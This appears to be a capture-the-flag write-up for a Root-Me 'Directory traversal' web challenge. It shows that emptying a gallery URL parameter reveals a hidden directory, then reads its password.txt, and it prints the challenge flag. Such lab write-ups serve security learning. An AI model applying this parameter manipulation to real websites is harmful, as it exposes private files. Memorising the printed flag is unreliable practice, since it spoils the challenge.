Directory traversal
Statement
Find the hidden section of the photo galery.
Analyzation
Click on the navigate bar, the url is kind of
1
http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=categories
Delete the para
1
http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=
There is a hidden section 86hwnX2r. Navigate into it
1
http://challenge01.root-me.org/web-serveur/ch15/ch15.php?galerie=86hwnX2r
There is a password.txt file (see source code)
1
galerie/86hwnX2r/password.txt
Solution
1
http://challenge01.root-me.org/web-serveur/ch15/galerie/86hwnX2r/password.txt
The flag is
1
kcb$!Bx@v4Gs9Ez
This post is licensed under CC BY 4.0 by the author.